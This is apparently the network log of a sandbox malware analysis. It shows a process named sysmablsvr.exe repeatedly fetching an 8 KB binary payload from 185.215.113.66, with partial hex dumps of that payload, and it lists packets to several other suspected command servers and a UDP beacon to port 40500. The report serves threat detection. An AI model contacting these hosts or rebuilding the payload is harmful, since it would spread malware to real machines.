                                            Sep 17, 2024 23:13:04.380382061 CEST4983680192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:13:04.385323048 CEST8049836185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:13:04.385425091 CEST4983680192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:13:04.385543108 CEST4983680192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:13:04.390347004 CEST8049836185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:13:05.072268963 CEST8049836185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:13:05.072324991 CEST4983680192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:13:05.497745991 CEST405004982495.59.118.94192.168.2.4
                                            Sep 17, 2024 23:13:05.497947931 CEST4982440500192.168.2.495.59.118.94
                                            Sep 17, 2024 23:13:08.116410971 CEST4983780192.168.2.477.91.77.92
                                            Sep 17, 2024 23:13:08.134638071 CEST804983777.91.77.92192.168.2.4
                                            Sep 17, 2024 23:13:08.134740114 CEST4983780192.168.2.477.91.77.92
                                            Sep 17, 2024 23:13:08.134874105 CEST4983780192.168.2.477.91.77.92
                                            Sep 17, 2024 23:13:08.161170959 CEST804983777.91.77.92192.168.2.4
                                            Sep 17, 2024 23:13:09.206978083 CEST4983840500192.168.2.45.133.123.159
                                            Sep 17, 2024 23:13:09.254283905 CEST40500498385.133.123.159192.168.2.4
                                            Sep 17, 2024 23:13:09.254355907 CEST4983840500192.168.2.45.133.123.159
                                            Sep 17, 2024 23:13:09.255374908 CEST4983840500192.168.2.45.133.123.159
                                            Sep 17, 2024 23:13:09.269211054 CEST4983840500192.168.2.45.133.123.159
                                            Sep 17, 2024 23:13:09.534617901 CEST4983840500192.168.2.45.133.123.159
                                            Sep 17, 2024 23:13:09.604866028 CEST40500498385.133.123.159192.168.2.4
                                            Sep 17, 2024 23:13:09.604882002 CEST40500498385.133.123.159192.168.2.4
                                            Sep 17, 2024 23:13:09.922728062 CEST804983777.91.77.92192.168.2.4
                                            Sep 17, 2024 23:13:09.923769951 CEST4983780192.168.2.477.91.77.92
                                            Sep 17, 2024 23:13:09.923883915 CEST4983780192.168.2.477.91.77.92
                                            Sep 17, 2024 23:13:09.949393034 CEST804983777.91.77.92192.168.2.4
                                            Sep 17, 2024 23:13:11.942872047 CEST4983980192.168.2.477.91.77.92
                                            Sep 17, 2024 23:13:12.010977030 CEST804983977.91.77.92192.168.2.4
                                            Sep 17, 2024 23:13:12.011154890 CEST4983980192.168.2.477.91.77.92
                                            Sep 17, 2024 23:13:12.011240005 CEST4983980192.168.2.477.91.77.92
                                            Sep 17, 2024 23:13:12.064850092 CEST804983977.91.77.92192.168.2.4
                                            Sep 17, 2024 23:13:13.778429985 CEST804983977.91.77.92192.168.2.4
                                            Sep 17, 2024 23:13:13.779439926 CEST4983980192.168.2.477.91.77.92
                                            Sep 17, 2024 23:13:13.779511929 CEST4983980192.168.2.477.91.77.92
                                            Sep 17, 2024 23:13:13.789038897 CEST804983977.91.77.92192.168.2.4
                                            Sep 17, 2024 23:13:15.567642927 CEST40500498305.233.220.4192.168.2.4
                                            Sep 17, 2024 23:13:15.570318937 CEST4983040500192.168.2.45.233.220.4

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Sep 17, 2024 23:09:18.095591068 CEST5914540500192.168.2.484.54.122.14
                                            Sep 17, 2024 23:09:23.161854982 CEST5914540500192.168.2.4178.151.4.209
                                            Sep 17, 2024 23:09:28.177603960 CEST5914540500192.168.2.4195.181.62.220
                                            Sep 17, 2024 23:09:33.235647917 CEST5914540500192.168.2.42.189.25.176
                                            Sep 17, 2024 23:09:38.241848946 CEST5914540500192.168.2.486.102.56.226
                                            Sep 17, 2024 23:09:43.241811991 CEST5914540500192.168.2.42.190.124.23
                                            Sep 17, 2024 23:09:48.239314079 CEST5914540500192.168.2.410.102.10.21
                                            Sep 17, 2024 23:09:53.262038946 CEST5914540500192.168.2.4100.66.253.251
                                            Sep 17, 2024 23:09:58.255064011 CEST5914540500192.168.2.4105.106.52.97
                                            Sep 17, 2024 23:10:03.308803082 CEST5914540500192.168.2.4217.30.170.10
                                            Sep 17, 2024 23:10:08.302854061 CEST5914540500192.168.2.4217.30.162.37
                                            Sep 17, 2024 23:10:13.319220066 CEST5914540500192.168.2.481.195.238.130
                                            Sep 17, 2024 23:10:18.318553925 CEST5914540500192.168.2.4178.130.83.254
                                            Sep 17, 2024 23:10:23.335541010 CEST5914540500192.168.2.446.100.121.146
                                            Sep 17, 2024 23:10:28.348341942 CEST5914540500192.168.2.437.255.23.100
                                            Sep 17, 2024 23:10:33.348572969 CEST5914540500192.168.2.487.237.234.24
                                            Sep 17, 2024 23:10:38.364094019 CEST5914540500192.168.2.4178.253.109.195
                                            Sep 17, 2024 23:10:43.380317926 CEST5914540500192.168.2.45.236.253.124
                                            Sep 17, 2024 23:10:48.397243977 CEST5914540500192.168.2.4213.230.127.213
                                            Sep 17, 2024 23:10:53.411549091 CEST5914540500192.168.2.482.194.13.95
                                            Sep 17, 2024 23:10:58.514940977 CEST5914540500192.168.2.489.43.145.18
                                            Sep 17, 2024 23:11:03.520358086 CEST5914540500192.168.2.479.165.23.131
                                            Sep 17, 2024 23:11:08.536109924 CEST5914540500192.168.2.4188.213.178.116
                                            Sep 17, 2024 23:11:13.541304111 CEST5914540500192.168.2.4151.240.79.133
                                            Sep 17, 2024 23:11:18.551662922 CEST5914540500192.168.2.491.218.161.58
                                            Sep 17, 2024 23:11:23.570591927 CEST5914540500192.168.2.4178.88.111.20
                                            Sep 17, 2024 23:11:28.602590084 CEST5914540500192.168.2.437.151.125.109
                                            Sep 17, 2024 23:11:33.598653078 CEST5914540500192.168.2.4100.67.22.76
                                            Sep 17, 2024 23:11:38.614980936 CEST5914540500192.168.2.489.249.62.14
                                            Sep 17, 2024 23:11:43.614862919 CEST5914540500192.168.2.492.47.27.126
                                            Sep 17, 2024 23:11:48.662898064 CEST5914540500192.168.2.437.151.162.116
                                            Sep 17, 2024 23:11:53.660979033 CEST5914540500192.168.2.489.36.181.43
                                            Sep 17, 2024 23:11:58.676865101 CEST5914540500192.168.2.4178.45.178.213
                                            Sep 17, 2024 23:12:03.696357012 CEST5914540500192.168.2.42.185.224.76
                                            Sep 17, 2024 23:12:08.708132029 CEST5914540500192.168.2.480.80.222.130
                                            Sep 17, 2024 23:12:13.708015919 CEST5914540500192.168.2.4151.235.83.141
                                            Sep 17, 2024 23:12:18.707808018 CEST5914540500192.168.2.42.185.144.157
                                            Sep 17, 2024 23:12:23.724097013 CEST5914540500192.168.2.478.39.225.27
                                            Sep 17, 2024 23:12:28.739573956 CEST5914540500192.168.2.437.228.65.185
                                            Sep 17, 2024 23:12:33.855828047 CEST5914540500192.168.2.4178.45.178.213
                                            Sep 17, 2024 23:12:38.848778963 CEST5914540500192.168.2.4149.54.47.90
                                            Sep 17, 2024 23:12:43.864557981 CEST5914540500192.168.2.437.150.142.35
                                            Sep 17, 2024 23:12:48.864965916 CEST5914540500192.168.2.45.232.85.255
                                            Sep 17, 2024 23:12:53.879962921 CEST5914540500192.168.2.4188.215.175.89
                                            Sep 17, 2024 23:12:58.897691011 CEST5914540500192.168.2.4100.109.48.43
                                            Sep 17, 2024 23:13:03.911230087 CEST5914540500192.168.2.4109.74.67.96
                                            Sep 17, 2024 23:13:08.927618027 CEST5914540500192.168.2.4203.142.81.102

                                            HTTP Request Dependency Graph

                                            • 185.215.113.66
                                            • 77.91.77.92
                                            • 91.202.233.141

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.449730185.215.113.66806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:09:15.569209099 CEST166OUTGET /1 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:09:16.259267092 CEST1236INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:09:16 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 7936
                                            Last-Modified: Tue, 17 Sep 2024 21:06:39 GMT
                                            Connection: keep-alive
                                            ETag: "66e9ef5f-1f00"
                                            Accept-Ranges: bytes
                                            Data Raw: 14 1a ce da 82 08 ba 24 75 30 7f 6a ed 06 00 e6 10 10 57 dd e0 5a 01 72 bd f9 d5 ed 1c 35 60 f9 32 ce d3 a5 ea 4d 2a e6 0c e1 3c 65 d9 da f4 7e 2e 7e c6 ba 6c 55 4d 43 8b 05 f1 2c 33 05 0f 5e ad 81 37 56 45 04 64 01 6c 05 f2 ca 9b fa c5 86 d7 7c d9 19 4e 35 30 82 8a e7 0f 4c 4f 27 fa f6 0f 6d b1 63 2f 86 d4 9b b3 b8 9e 89 04 9f cc 59 b6 c8 6c 39 8e 85 db 24 67 1e 58 a4 34 75 41 9a ef 46 4a a7 1f ea b8 e5 66 6b 34 84 cb d2 5a 5c 61 e3 2a ec c0 b3 7a 6d bd 66 90 03 6b 60 c1 d3 3d cd f9 87 e8 32 b6 e7 85 b9 e4 c8 61 17 9d 1c 0d 5c 46 b8 c4 60 53 71 ba ab 09 fc ef 95 54 1c 84 a0 7a d9 10 c0 39 d8 2e 2d 2a 56 d3 b6 ee ee c1 dc cd 7a 9e 33 73 ec 32 64 ae 69 89 98 32 5a 29 b9 f2 81 dd 89 8c 00 6b 4a f7 21 ba ae 4a dc 2c 5f a9 20 d6 81 fd 4d f4 76 b4 52 7a 8f 9b 01 cc af 72 96 0d e8 7f cf 9e 80 24 c7 d2 ae 56 27 1f c6 27 9e 0a 4b 97 c9 ab ab d5 b7 40 4a fb b8 5a b5 13 1d 45 de ed 7b 13 44 ed e2 38 90 ef cf 34 ad 54 5b 38 00 6a 93 51 63 8b be a0 f0 20 18 4f 49 f8 31 a7 c2 9c 9a 36 cc 52 ac 12 de 12 6d f1 54 [TRUNCATED]
                                            Data Ascii: $u0jWZr5`2M*<e~.~lUMC,3^7VEdl|N50LO'mc/Yl9$gX4uAFJfk4Z\a*zmfk`=2a\F`SqTz9.-*Vz3s2di2Z)kJ!J,_ MvRzr$V''K@JZE{D84T[8jQc OI16RmT=gyJV9qUMuD6QEl"{.d=~rD$Ep=-Kg|I&]c)XYT,x7~W9r{$hKKvfK5w}yBLS^nX]P>=qU0_D*F&BRB1+Y@$2c#6:Pnr}$x/ql~p2 Qm&>CG)Iu$.I@q;@T9u'Odcm7r}y*}}?FHwx,6,$sg"S|Y):#lQLqye)>8`56f/iIq)cKG-i)iM1-]eLd3}fDA]\<Jr~SWEoXf5O5_g5,V|sB}T;uQT:z~*B88Smqm*gg9D;W@t^
                                            Sep 17, 2024 23:09:16.259324074 CEST1236INData Raw: a8 cd b6 25 a2 da 1a 53 6e 9c 3d e0 c0 2c b0 89 c9 36 5e 59 78 e5 46 22 d4 dd 8d ff 8c 57 da 6b 79 15 f8 be 5e db e9 49 15 0f f8 c3 4f 96 07 14 e2 9a 29 ff 2d 40 fd 3b 29 86 ca 57 e5 fb 68 04 d3 a7 dd 89 cf e1 60 e7 16 2d 5e 1f e7 1c 80 8e 86 df
                                            Data Ascii: %Sn=,6^YxF"Wky^IO)-@;)Wh`-^<`;!L?S@MN!$R"RgVUFcl{a6J4;_9=ipvrbLp}=|7 '.t}!sc\=}j
                                            Sep 17, 2024 23:09:16.259356022 CEST1236INData Raw: bd 52 fd db cc 9b fc 19 4c 24 14 3a f8 15 aa f8 d2 28 b0 81 08 a3 83 e9 8d a9 68 84 95 22 8f bf 70 c5 c3 31 4f 46 17 26 19 c0 74 19 3a df 70 26 8d c0 61 94 1f b2 60 86 45 0b 4f 28 60 1a 98 cc 83 f5 48 8b 87 ce 2c 0c 8c 32 08 c5 3c 6a 67 68 8a 1b
                                            Data Ascii: RL$:(h"p1OF&t:p&a`EO(`H,2<jgh<lWm6Yi-"i^t(/v%Y{H5IiNsO6\gP=a-jR94,Gi!xr~Z)F<WR4Z-+lm[*
                                            Sep 17, 2024 23:09:16.259716988 CEST1236INData Raw: d7 f3 2e 8d 8d 14 f5 b5 9f 7a 63 f6 a5 d8 1a 7c 20 73 ff 8e 3d 30 7a dd eb 21 21 b3 f9 61 8c d5 2b fe 2d a1 ba 84 7b d4 a9 1d 58 0e 2b 45 90 e9 60 fe 22 89 e1 f0 b4 9a 10 da cd 73 31 e1 bb 58 72 26 c0 bf e3 d9 d3 02 33 02 61 b9 fe 1e bc 27 56 16
                                            Data Ascii: .zc| s=0z!!a+-{X+E`"s1Xr&3a'VS:JN4sZO~"NX#"{W`0c>?'Ao.mcBF+5),Tk.8O:*Uvw}!\NvuLscl,UdS*uEcSh.
                                            Sep 17, 2024 23:09:16.259732008 CEST1236INData Raw: fb b6 7f 01 cb 83 9c ee 28 41 1b 8d 78 f9 94 d9 c6 b9 86 0b e3 73 c1 45 58 68 0b ab d3 47 ef 20 86 7b 55 d3 0c c7 b1 57 4f a7 20 cc 91 fa 41 9a 3d 58 7d e2 89 40 e4 51 3c 59 f9 49 f2 74 56 b3 66 34 4f 7c 10 6b bf f5 25 ce f7 63 be 60 cf 88 9f c7
                                            Data Ascii: (AxsEXhG {UWO A=X}@Q<YItVf4O|k%c`1HY@:o|k*(NTR^UZ!%W?y!\2LF%0HN7(%u*)X6OP3O9U+8t@GB<5V<u2JgHVQM`WBuS*
                                            Sep 17, 2024 23:09:16.259747982 CEST1236INData Raw: 90 bf ae ec 13 9d a5 4b e9 3e 96 7d 0f 9d b6 32 3c 1a 52 f8 10 a1 cf 98 d2 01 cf 79 55 d5 06 f1 2b cf f1 19 79 42 ba 77 de b5 f5 09 d1 13 61 a4 39 69 3f 6c ba 23 9c 2a bb ac 20 1c d2 25 85 7d f6 de a1 1f 26 49 d8 fb 80 30 2d c2 27 f1 9d 56 c6 3a
                                            Data Ascii: K>}2<RyU+yBwa9i?l#* %}&I0-'V:7ih`JX`JyJ 7#g=cfxe*z}^Gbbw;+1Pl\C&fots7I>5U^'7
                                            Sep 17, 2024 23:09:16.260427952 CEST776INData Raw: af 2d 94 59 fe 1d 33 87 3e e9 41 18 09 db d0 b8 9b 92 b4 44 c0 1e b5 bc 8e dd 96 e8 06 f3 c6 a1 5a a3 a9 93 28 47 ce 2b dc 08 af 4e 85 c6 48 22 91 67 96 5b ab af d2 7f bf de 80 e2 3c d5 57 b8 35 24 f9 39 e7 93 01 7b 25 f3 d7 59 75 0d f9 37 8c 7f
                                            Data Ascii: -Y3>ADZ(G+NH"g[<W5$9{%Yu7seOC{%XIcbc&Ch2?`c%2H5_@&r3-"j41%%uv#Sh}<~~`FF<Eq:7M{(hNYf'


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.449732185.215.113.66806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:09:17.274733067 CEST166OUTGET /1 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:09:17.984699965 CEST1236INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:09:17 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 7936
                                            Last-Modified: Tue, 17 Sep 2024 21:06:39 GMT
                                            Connection: keep-alive
                                            ETag: "66e9ef5f-1f00"
                                            Accept-Ranges: bytes
                                            Data Raw: 14 1a ce da 82 08 ba 24 75 30 7f 6a ed 06 00 e6 10 10 57 dd e0 5a 01 72 bd f9 d5 ed 1c 35 60 f9 32 ce d3 a5 ea 4d 2a e6 0c e1 3c 65 d9 da f4 7e 2e 7e c6 ba 6c 55 4d 43 8b 05 f1 2c 33 05 0f 5e ad 81 37 56 45 04 64 01 6c 05 f2 ca 9b fa c5 86 d7 7c d9 19 4e 35 30 82 8a e7 0f 4c 4f 27 fa f6 0f 6d b1 63 2f 86 d4 9b b3 b8 9e 89 04 9f cc 59 b6 c8 6c 39 8e 85 db 24 67 1e 58 a4 34 75 41 9a ef 46 4a a7 1f ea b8 e5 66 6b 34 84 cb d2 5a 5c 61 e3 2a ec c0 b3 7a 6d bd 66 90 03 6b 60 c1 d3 3d cd f9 87 e8 32 b6 e7 85 b9 e4 c8 61 17 9d 1c 0d 5c 46 b8 c4 60 53 71 ba ab 09 fc ef 95 54 1c 84 a0 7a d9 10 c0 39 d8 2e 2d 2a 56 d3 b6 ee ee c1 dc cd 7a 9e 33 73 ec 32 64 ae 69 89 98 32 5a 29 b9 f2 81 dd 89 8c 00 6b 4a f7 21 ba ae 4a dc 2c 5f a9 20 d6 81 fd 4d f4 76 b4 52 7a 8f 9b 01 cc af 72 96 0d e8 7f cf 9e 80 24 c7 d2 ae 56 27 1f c6 27 9e 0a 4b 97 c9 ab ab d5 b7 40 4a fb b8 5a b5 13 1d 45 de ed 7b 13 44 ed e2 38 90 ef cf 34 ad 54 5b 38 00 6a 93 51 63 8b be a0 f0 20 18 4f 49 f8 31 a7 c2 9c 9a 36 cc 52 ac 12 de 12 6d f1 54 [TRUNCATED]
                                            Data Ascii: $u0jWZr5`2M*<e~.~lUMC,3^7VEdl|N50LO'mc/Yl9$gX4uAFJfk4Z\a*zmfk`=2a\F`SqTz9.-*Vz3s2di2Z)kJ!J,_ MvRzr$V''K@JZE{D84T[8jQc OI16RmT=gyJV9qUMuD6QEl"{.d=~rD$Ep=-Kg|I&]c)XYT,x7~W9r{$hKKvfK5w}yBLS^nX]P>=qU0_D*F&BRB1+Y@$2c#6:Pnr}$x/ql~p2 Qm&>CG)Iu$.I@q;@T9u'Odcm7r}y*}}?FHwx,6,$sg"S|Y):#lQLqye)>8`56f/iIq)cKG-i)iM1-]eLd3}fDA]\<Jr~SWEoXf5O5_g5,V|sB}T;uQT:z~*B88Smqm*gg9D;W@t^
                                            Sep 17, 2024 23:09:17.984724045 CEST1236INData Raw: a8 cd b6 25 a2 da 1a 53 6e 9c 3d e0 c0 2c b0 89 c9 36 5e 59 78 e5 46 22 d4 dd 8d ff 8c 57 da 6b 79 15 f8 be 5e db e9 49 15 0f f8 c3 4f 96 07 14 e2 9a 29 ff 2d 40 fd 3b 29 86 ca 57 e5 fb 68 04 d3 a7 dd 89 cf e1 60 e7 16 2d 5e 1f e7 1c 80 8e 86 df
                                            Data Ascii: %Sn=,6^YxF"Wky^IO)-@;)Wh`-^<`;!L?S@MN!$R"RgVUFcl{a6J4;_9=ipvrbLp}=|7 '.t}!sc\=}j
                                            Sep 17, 2024 23:09:17.984756947 CEST1236INData Raw: bd 52 fd db cc 9b fc 19 4c 24 14 3a f8 15 aa f8 d2 28 b0 81 08 a3 83 e9 8d a9 68 84 95 22 8f bf 70 c5 c3 31 4f 46 17 26 19 c0 74 19 3a df 70 26 8d c0 61 94 1f b2 60 86 45 0b 4f 28 60 1a 98 cc 83 f5 48 8b 87 ce 2c 0c 8c 32 08 c5 3c 6a 67 68 8a 1b
                                            Data Ascii: RL$:(h"p1OF&t:p&a`EO(`H,2<jgh<lWm6Yi-"i^t(/v%Y{H5IiNsO6\gP=a-jR94,Gi!xr~Z)F<WR4Z-+lm[*
                                            Sep 17, 2024 23:09:17.985251904 CEST1236INData Raw: d7 f3 2e 8d 8d 14 f5 b5 9f 7a 63 f6 a5 d8 1a 7c 20 73 ff 8e 3d 30 7a dd eb 21 21 b3 f9 61 8c d5 2b fe 2d a1 ba 84 7b d4 a9 1d 58 0e 2b 45 90 e9 60 fe 22 89 e1 f0 b4 9a 10 da cd 73 31 e1 bb 58 72 26 c0 bf e3 d9 d3 02 33 02 61 b9 fe 1e bc 27 56 16
                                            Data Ascii: .zc| s=0z!!a+-{X+E`"s1Xr&3a'VS:JN4sZO~"NX#"{W`0c>?'Ao.mcBF+5),Tk.8O:*Uvw}!\NvuLscl,UdS*uEcSh.
                                            Sep 17, 2024 23:09:17.985268116 CEST1236INData Raw: fb b6 7f 01 cb 83 9c ee 28 41 1b 8d 78 f9 94 d9 c6 b9 86 0b e3 73 c1 45 58 68 0b ab d3 47 ef 20 86 7b 55 d3 0c c7 b1 57 4f a7 20 cc 91 fa 41 9a 3d 58 7d e2 89 40 e4 51 3c 59 f9 49 f2 74 56 b3 66 34 4f 7c 10 6b bf f5 25 ce f7 63 be 60 cf 88 9f c7
                                            Data Ascii: (AxsEXhG {UWO A=X}@Q<YItVf4O|k%c`1HY@:o|k*(NTR^UZ!%W?y!\2LF%0HN7(%u*)X6OP3O9U+8t@GB<5V<u2JgHVQM`WBuS*
                                            Sep 17, 2024 23:09:17.985284090 CEST1236INData Raw: 90 bf ae ec 13 9d a5 4b e9 3e 96 7d 0f 9d b6 32 3c 1a 52 f8 10 a1 cf 98 d2 01 cf 79 55 d5 06 f1 2b cf f1 19 79 42 ba 77 de b5 f5 09 d1 13 61 a4 39 69 3f 6c ba 23 9c 2a bb ac 20 1c d2 25 85 7d f6 de a1 1f 26 49 d8 fb 80 30 2d c2 27 f1 9d 56 c6 3a
                                            Data Ascii: K>}2<RyU+yBwa9i?l#* %}&I0-'V:7ih`JX`JyJ 7#g=cfxe*z}^Gbbw;+1Pl\C&fots7I>5U^'7
                                            Sep 17, 2024 23:09:17.985702038 CEST776INData Raw: af 2d 94 59 fe 1d 33 87 3e e9 41 18 09 db d0 b8 9b 92 b4 44 c0 1e b5 bc 8e dd 96 e8 06 f3 c6 a1 5a a3 a9 93 28 47 ce 2b dc 08 af 4e 85 c6 48 22 91 67 96 5b ab af d2 7f bf de 80 e2 3c d5 57 b8 35 24 f9 39 e7 93 01 7b 25 f3 d7 59 75 0d f9 37 8c 7f
                                            Data Ascii: -Y3>ADZ(G+NH"g[<W5$9{%Yu7seOC{%XIcbc&Ch2?`c%2H5_@&r3-"j41%%uv#Sh}<~~`FF<Eq:7M{(hNYf'
                                            Sep 17, 2024 23:09:18.072895050 CEST8INData Raw: 1b b5 08 3e b6 9b 0d ab
                                            Data Ascii: >


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.449734185.215.113.66806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:09:20.238425970 CEST274OUTGET /1 HTTP/1.1
                                            Accept: */*
                                            Accept-Encoding: gzip, deflate
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                            Host: 185.215.113.66
                                            Connection: Keep-Alive
                                            Sep 17, 2024 23:09:20.952914000 CEST1236INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:09:20 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 7936
                                            Last-Modified: Tue, 17 Sep 2024 21:06:39 GMT
                                            Connection: keep-alive
                                            ETag: "66e9ef5f-1f00"
                                            Accept-Ranges: bytes
                                            Data Raw: 14 1a ce da 82 08 ba 24 75 30 7f 6a ed 06 00 e6 10 10 57 dd e0 5a 01 72 bd f9 d5 ed 1c 35 60 f9 32 ce d3 a5 ea 4d 2a e6 0c e1 3c 65 d9 da f4 7e 2e 7e c6 ba 6c 55 4d 43 8b 05 f1 2c 33 05 0f 5e ad 81 37 56 45 04 64 01 6c 05 f2 ca 9b fa c5 86 d7 7c d9 19 4e 35 30 82 8a e7 0f 4c 4f 27 fa f6 0f 6d b1 63 2f 86 d4 9b b3 b8 9e 89 04 9f cc 59 b6 c8 6c 39 8e 85 db 24 67 1e 58 a4 34 75 41 9a ef 46 4a a7 1f ea b8 e5 66 6b 34 84 cb d2 5a 5c 61 e3 2a ec c0 b3 7a 6d bd 66 90 03 6b 60 c1 d3 3d cd f9 87 e8 32 b6 e7 85 b9 e4 c8 61 17 9d 1c 0d 5c 46 b8 c4 60 53 71 ba ab 09 fc ef 95 54 1c 84 a0 7a d9 10 c0 39 d8 2e 2d 2a 56 d3 b6 ee ee c1 dc cd 7a 9e 33 73 ec 32 64 ae 69 89 98 32 5a 29 b9 f2 81 dd 89 8c 00 6b 4a f7 21 ba ae 4a dc 2c 5f a9 20 d6 81 fd 4d f4 76 b4 52 7a 8f 9b 01 cc af 72 96 0d e8 7f cf 9e 80 24 c7 d2 ae 56 27 1f c6 27 9e 0a 4b 97 c9 ab ab d5 b7 40 4a fb b8 5a b5 13 1d 45 de ed 7b 13 44 ed e2 38 90 ef cf 34 ad 54 5b 38 00 6a 93 51 63 8b be a0 f0 20 18 4f 49 f8 31 a7 c2 9c 9a 36 cc 52 ac 12 de 12 6d f1 54 [TRUNCATED]
                                            Data Ascii: $u0jWZr5`2M*<e~.~lUMC,3^7VEdl|N50LO'mc/Yl9$gX4uAFJfk4Z\a*zmfk`=2a\F`SqTz9.-*Vz3s2di2Z)kJ!J,_ MvRzr$V''K@JZE{D84T[8jQc OI16RmT=gyJV9qUMuD6QEl"{.d=~rD$Ep=-Kg|I&]c)XYT,x7~W9r{$hKKvfK5w}yBLS^nX]P>=qU0_D*F&BRB1+Y@$2c#6:Pnr}$x/ql~p2 Qm&>CG)Iu$.I@q;@T9u'Odcm7r}y*}}?FHwx,6,$sg"S|Y):#lQLqye)>8`56f/iIq)cKG-i)iM1-]eLd3}fDA]\<Jr~SWEoXf5O5_g5,V|sB}T;uQT:z~*B88Smqm*gg9D;W@t^
                                            Sep 17, 2024 23:09:20.953231096 CEST1236INData Raw: a8 cd b6 25 a2 da 1a 53 6e 9c 3d e0 c0 2c b0 89 c9 36 5e 59 78 e5 46 22 d4 dd 8d ff 8c 57 da 6b 79 15 f8 be 5e db e9 49 15 0f f8 c3 4f 96 07 14 e2 9a 29 ff 2d 40 fd 3b 29 86 ca 57 e5 fb 68 04 d3 a7 dd 89 cf e1 60 e7 16 2d 5e 1f e7 1c 80 8e 86 df
                                            Data Ascii: %Sn=,6^YxF"Wky^IO)-@;)Wh`-^<`;!L?S@MN!$R"RgVUFcl{a6J4;_9=ipvrbLp}=|7 '.t}!sc\=}j
                                            Sep 17, 2024 23:09:20.953250885 CEST448INData Raw: bd 52 fd db cc 9b fc 19 4c 24 14 3a f8 15 aa f8 d2 28 b0 81 08 a3 83 e9 8d a9 68 84 95 22 8f bf 70 c5 c3 31 4f 46 17 26 19 c0 74 19 3a df 70 26 8d c0 61 94 1f b2 60 86 45 0b 4f 28 60 1a 98 cc 83 f5 48 8b 87 ce 2c 0c 8c 32 08 c5 3c 6a 67 68 8a 1b
                                            Data Ascii: RL$:(h"p1OF&t:p&a`EO(`H,2<jgh<lWm6Yi-"i^t(/v%Y{H5IiNsO6\gP=a-jR94,Gi!xr~Z)F<WR4Z-+lm[*
                                            Sep 17, 2024 23:09:20.953288078 CEST1236INData Raw: 8a ff 83 22 c8 95 a3 8f b1 4a 38 b5 2d bb cd 5f 4e 56 ec 78 f2 2a 77 31 8e 84 ce 5f 01 9a 88 8c 69 78 7b fd d1 e9 90 ce fe 19 9e 71 f0 74 06 bd 8e 4b 2b c8 64 c7 2f 6c ac 9d 86 51 f9 3f 34 9e 6b 84 9f 6f bf 8a ab 20 11 6b d1 b9 32 c9 ad 31 26 8f
                                            Data Ascii: "J8-_NVx*w1_ix{qtK+d/lQ?4ko k21&p"NX^xp7'a#/n5za\a@hks_jq9mmC]ZF.?9&3FQQjOrl}u]?#B<
                                            Sep 17, 2024 23:09:20.953299999 CEST1236INData Raw: a3 9e 70 26 2d 00 71 9f 71 d4 4d 7a d0 f3 1c 0f 04 10 cb 9a 79 d7 26 8f 1d c1 cf 2b da 1a a8 b2 33 fa 6c 30 25 2e 24 74 32 6b 2f 20 ad 89 f4 1c 13 0e 03 f8 7a e3 ea 88 da f8 db d8 4b 75 28 fb 0d 03 74 64 2d c0 6f ec 7c 04 02 95 be 55 6f e0 c2 7c
                                            Data Ascii: p&-qqMzy&+3l0%.$t2k/ zKu(td-o|Uo|-mh3O4nloL;zvMwI6j( jxm%MN7c3"E eBQ%k75R3FF5B|Ws
                                            Sep 17, 2024 23:09:20.953783035 CEST1236INData Raw: 91 49 c1 2a 12 b8 b0 a9 d8 17 cb 3a 12 c7 e3 7c a5 03 4f b4 e0 6f 9c 0f e7 05 56 89 13 01 2e 57 8d a6 90 2d b4 9d 7e 7d ed 69 48 01 1d 6a 10 ef fe 4b e2 e5 f5 a4 22 95 85 0f af 55 50 55 e5 fb b7 be 00 67 40 4d f9 41 19 09 d0 1c fb 85 ca 46 e9 39
                                            Data Ascii: I*:|OoV.W-~}iHjK"UPUg@MAF9o_<,_7VMV>0pYZley?SAe~r$S0B(wtV74l#F{kf?se_<A9f^Lc}/ :DC=/~2JhY"j
                                            Sep 17, 2024 23:09:20.953793049 CEST672INData Raw: 33 25 5a 99 e4 c8 3a 3b b9 7d 52 56 ea 5a fd 47 b2 99 75 9a fe 01 89 11 e0 f9 89 a0 f0 57 aa 9a e0 f3 6a 1f db 8b 59 f6 8e 92 a8 6b d0 c0 d0 81 23 b7 de 98 3d 07 b3 98 4f 84 16 60 b3 dd ab 53 0a e4 77 2b cc e6 31 65 b3 5f 58 b3 04 3f 64 c3 84 f3
                                            Data Ascii: 3%Z:;}RVZGuWjYk#=O`Sw+1e_X?dVqB)?d4SDeF!/V!Wi((3QPn|CSe,CJ4s`j:iK<}"X'sTfDxmo}`n}7U;ufk %
